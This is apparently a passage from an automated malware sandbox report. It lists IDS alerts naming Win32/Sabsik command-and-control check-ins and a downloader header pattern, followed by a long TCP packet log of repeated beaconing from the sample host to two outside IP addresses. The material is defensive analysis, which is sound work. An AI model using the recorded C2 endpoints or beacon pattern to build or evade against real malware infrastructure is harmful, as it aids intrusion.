                                  2024-10-05T16:48:00.299639+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.75048234.117.59.8180TCP
                                  2024-10-05T16:48:00.304354+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750481193.142.146.648880TCP
                                  2024-10-05T16:48:02.197951+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750483193.142.146.648880TCP
                                  2024-10-05T16:48:02.247009+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.75048434.117.59.8180TCP
                                  2024-10-05T16:48:04.820098+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.75048634.117.59.8180TCP
                                  2024-10-05T16:48:04.824904+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750485193.142.146.648880TCP
                                  2024-10-05T16:48:07.476703+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750487193.142.146.648880TCP
                                  2024-10-05T16:48:10.104002+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750489193.142.146.648880TCP
                                  2024-10-05T16:48:12.680846+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750491193.142.146.648880TCP
                                  2024-10-05T16:48:15.229115+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750493193.142.146.648880TCP
                                  2024-10-05T16:48:15.325187+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.75049434.117.59.8180TCP
                                  2024-10-05T16:48:17.736987+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750495193.142.146.648880TCP
                                  2024-10-05T16:48:19.767983+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.75049834.117.59.8180TCP
                                  2024-10-05T16:48:22.877229+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750499193.142.146.648880TCP
                                  2024-10-05T16:48:22.918949+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.75050034.117.59.8180TCP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Oct 5, 2024 16:46:39.305139065 CEST498038880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:39.310081005 CEST888049803193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:39.310151100 CEST498038880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:39.542460918 CEST4980480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:39.547753096 CEST804980434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:39.547869921 CEST4980480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:39.548820972 CEST4980480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:39.553684950 CEST804980434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:40.215892076 CEST804980434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:40.234298944 CEST498038880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:40.239494085 CEST804980434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:40.239526987 CEST888049803193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:40.239577055 CEST4980480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:40.239619970 CEST498038880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:40.244527102 CEST888049803193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:40.934097052 CEST888049803193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:40.935946941 CEST498038880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:40.946943998 CEST498038880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:40.951766968 CEST888049803193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:41.950321913 CEST498158880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:41.955229044 CEST888049815193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:41.955347061 CEST498158880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:41.957458019 CEST4980480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:41.959182024 CEST4981680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:41.962647915 CEST804980434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:41.962727070 CEST4980480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:41.964112997 CEST804981634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:41.964262009 CEST4981680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:41.964350939 CEST4981680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:41.969563961 CEST804981634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:42.475538969 CEST804981634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:42.476047039 CEST498158880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:42.480957031 CEST888049815193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:42.481091022 CEST498158880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:42.485932112 CEST888049815193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:42.653198004 CEST4981680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:43.606344938 CEST888049815193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:43.606470108 CEST498158880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:43.661052942 CEST498158880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:43.665894032 CEST888049815193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:44.668901920 CEST498328880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:44.673840046 CEST888049832193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:44.673964024 CEST498328880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:44.674532890 CEST4981680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:44.676321983 CEST4983380192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:44.679591894 CEST804981634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:44.679655075 CEST4981680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:44.681231976 CEST804983334.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:44.681734085 CEST4983380192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:44.681809902 CEST4983380192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:44.686661959 CEST804983334.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:45.156877995 CEST804983334.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:45.158427000 CEST4983380192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:45.158529997 CEST498328880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:45.163429022 CEST888049832193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:45.163501024 CEST498328880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:45.163537025 CEST804983334.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:45.163599014 CEST4983380192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:45.168323994 CEST888049832193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:46.293195963 CEST888049832193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:46.293957949 CEST498328880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:46.294245958 CEST498328880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:46.299104929 CEST888049832193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:47.310575962 CEST498498880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:47.315514088 CEST888049849193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:47.315597057 CEST498498880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:47.316762924 CEST4985080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:47.321683884 CEST804985034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:47.321814060 CEST4985080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:47.321887016 CEST4985080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:47.326757908 CEST804985034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:47.797816992 CEST804985034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:47.798048973 CEST498498880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:47.803308964 CEST888049849193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:47.803364992 CEST498498880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:47.808928967 CEST888049849193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:47.890259027 CEST4985080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:48.955012083 CEST888049849193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:48.955143929 CEST498498880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:48.955373049 CEST498498880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:48.960989952 CEST888049849193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:49.966101885 CEST498618880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:50.067760944 CEST888049861193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:50.067843914 CEST498618880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:50.069238901 CEST4986580192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:50.069581985 CEST4985080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:50.075504065 CEST804986534.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:50.075624943 CEST4986580192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:50.075680971 CEST4986580192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:50.076164007 CEST804985034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:50.076227903 CEST4985080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:50.080563068 CEST804986534.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:50.579448938 CEST804986534.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:50.579823971 CEST498618880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:50.585625887 CEST888049861193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:50.585726976 CEST498618880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:50.591413021 CEST888049861193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:50.715544939 CEST4986580192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:51.685458899 CEST888049861193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:51.685596943 CEST498618880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:51.685719013 CEST498618880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:51.690654039 CEST888049861193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:52.751785040 CEST503288880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:52.756742001 CEST888050328193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:52.757905960 CEST503288880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:52.762459993 CEST5032980192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:52.767421007 CEST805032934.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:52.769845009 CEST5032980192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:52.770040989 CEST5032980192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:52.770651102 CEST4986580192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:52.775017023 CEST805032934.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:52.776619911 CEST804986534.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:52.776742935 CEST4986580192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:53.566658974 CEST805032934.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:53.567001104 CEST503288880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:53.567800999 CEST805032934.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:53.567847967 CEST5032980192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:53.572154999 CEST888050328193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:53.572279930 CEST503288880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:53.577480078 CEST888050328193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:54.406549931 CEST888050328193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:54.406660080 CEST503288880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:54.407054901 CEST503288880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:54.411847115 CEST888050328193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:55.441694975 CEST503428880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:55.446783066 CEST888050342193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:55.447845936 CEST503428880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:55.494941950 CEST5032980192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:55.500900030 CEST805032934.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:55.500958920 CEST5032980192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:55.889417887 CEST5034880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:55.894391060 CEST805034834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:55.897856951 CEST5034880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:55.901055098 CEST5034880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:55.905864954 CEST805034834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:56.379522085 CEST805034834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:56.379791021 CEST503428880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:56.384644032 CEST888050342193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:56.384697914 CEST503428880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:56.389682055 CEST888050342193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:56.434286118 CEST5034880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:57.078176975 CEST888050342193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:57.078306913 CEST503428880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:57.078635931 CEST503428880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:57.083441973 CEST888050342193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:58.092212915 CEST503638880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:58.097228050 CEST888050363193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:58.097347021 CEST503638880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:58.098867893 CEST5036480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:58.098913908 CEST5034880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:58.103785038 CEST805036434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:58.103899002 CEST5036480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:58.103904009 CEST805034834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:58.103980064 CEST5036480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:58.103985071 CEST5034880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:58.108771086 CEST805036434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:58.681879044 CEST805036434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:46:58.682431936 CEST503638880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:58.687654972 CEST888050363193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:58.687896013 CEST503638880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:58.693073034 CEST888050363193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:58.731300116 CEST5036480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:46:59.979429007 CEST888050363193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:59.979501963 CEST503638880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:59.979528904 CEST888050363193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:46:59.979598045 CEST503638880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:59.979749918 CEST503638880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:46:59.984606028 CEST888050363193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:00.981389046 CEST503808880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:00.986196041 CEST888050380193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:00.986294031 CEST503808880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:00.987627983 CEST5038180192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:00.987951040 CEST5036480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:00.992429018 CEST805038134.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:00.992677927 CEST5038180192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:00.992677927 CEST5038180192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:00.993052959 CEST805036434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:00.993125916 CEST5036480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:00.997484922 CEST805038134.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:01.493001938 CEST805038134.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:01.493278027 CEST503808880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:01.498176098 CEST888050380193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:01.498486996 CEST503808880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:01.503341913 CEST888050380193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:01.543771982 CEST5038180192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:02.660538912 CEST888050380193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:02.660595894 CEST503808880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:02.660819054 CEST503808880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:02.665528059 CEST888050380193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:03.673680067 CEST503978880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:03.678589106 CEST888050397193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:03.678803921 CEST503978880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:03.682146072 CEST5039880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:03.682297945 CEST5038180192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:03.686944008 CEST805039834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:03.687362909 CEST805038134.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:03.687443972 CEST5039880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:03.687472105 CEST5038180192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:03.688852072 CEST5039880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:03.693587065 CEST805039834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:04.163184881 CEST805039834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:04.163676023 CEST503978880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:04.168539047 CEST888050397193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:04.168605089 CEST503978880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:04.173495054 CEST888050397193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:04.215572119 CEST5039880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:05.295296907 CEST888050397193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:05.295356035 CEST503978880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:05.295598984 CEST503978880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:05.300389051 CEST888050397193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:06.310360909 CEST504148880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:06.315464973 CEST888050414193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:06.315690041 CEST504148880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:06.316253901 CEST5039880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:06.316998959 CEST5041580192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:06.321333885 CEST805039834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:06.321912050 CEST805041534.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:06.322098970 CEST5039880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:06.322195053 CEST5041580192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:06.322479010 CEST5041580192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:06.327205896 CEST805041534.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:06.805242062 CEST805041534.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:06.806320906 CEST504148880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:06.814665079 CEST888050414193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:06.815408945 CEST504148880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:06.820346117 CEST888050414193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:06.856286049 CEST5041580192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:07.936274052 CEST888050414193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:07.936491966 CEST504148880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:07.936682940 CEST504148880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:07.941518068 CEST888050414193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:08.950181961 CEST504318880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:08.955533028 CEST888050431193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:08.955663919 CEST504318880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:08.956245899 CEST5041580192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:08.957134962 CEST5043280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:08.961643934 CEST805041534.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:08.961700916 CEST5041580192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:08.961936951 CEST805043234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:08.961997986 CEST5043280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:08.962059021 CEST5043280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:08.966917038 CEST805043234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:09.473046064 CEST805043234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:09.473381996 CEST504318880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:09.479325056 CEST888050431193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:09.479387045 CEST504318880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:09.487993002 CEST888050431193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:09.528081894 CEST5043280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:11.605921030 CEST888050431193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:11.605998993 CEST504318880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:11.606045961 CEST888050431193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:11.606075048 CEST888050431193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:11.606091022 CEST504318880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:11.606113911 CEST504318880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:11.606173992 CEST888050431193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:11.606220007 CEST504318880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:11.606630087 CEST504318880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:11.611423016 CEST888050431193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:12.622154951 CEST504448880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:12.627302885 CEST888050444193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:12.629920006 CEST504448880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:12.631086111 CEST5043280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:12.631237030 CEST5044580192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:12.636084080 CEST805044534.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:12.636212111 CEST805043234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:12.636290073 CEST5043280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:12.636291981 CEST5044580192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:12.636420965 CEST5044580192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:12.641237974 CEST805044534.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:13.113657951 CEST805044534.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:13.114829063 CEST504448880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:13.119646072 CEST888050444193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:13.121800900 CEST504448880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:13.126610994 CEST888050444193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:13.168742895 CEST5044580192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:14.247096062 CEST888050444193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:14.247179985 CEST504448880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:14.247344971 CEST504448880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:14.252332926 CEST888050444193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:15.263770103 CEST504498880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:15.268829107 CEST888050449193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:15.269869089 CEST504498880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:15.270512104 CEST5044580192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:15.271272898 CEST5045080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:15.275634050 CEST805044534.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:15.276200056 CEST805045034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:15.276262999 CEST5044580192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:15.276300907 CEST5045080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:15.276431084 CEST5045080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:15.281220913 CEST805045034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:15.765188932 CEST805045034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:15.765516996 CEST504498880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:15.770382881 CEST888050449193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:15.770445108 CEST504498880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:15.775254011 CEST888050449193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:15.809463024 CEST5045080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:16.923315048 CEST888050449193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:16.923379898 CEST504498880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:16.923590899 CEST504498880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:16.928493977 CEST888050449193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:17.934777975 CEST504518880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:17.939856052 CEST888050451193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:17.939929008 CEST504518880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:17.940618992 CEST5045080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:17.941545010 CEST5045280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:17.945976973 CEST805045034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:17.946038008 CEST5045080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:17.946454048 CEST805045234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:17.946512938 CEST5045280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:17.946633101 CEST5045280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:17.951409101 CEST805045234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:18.431031942 CEST805045234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:18.431307077 CEST504518880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:18.441807985 CEST888050451193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:18.441886902 CEST504518880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:18.448179960 CEST888050451193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:18.481657028 CEST5045280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:19.561547041 CEST888050451193.142.146.64192.168.2.7
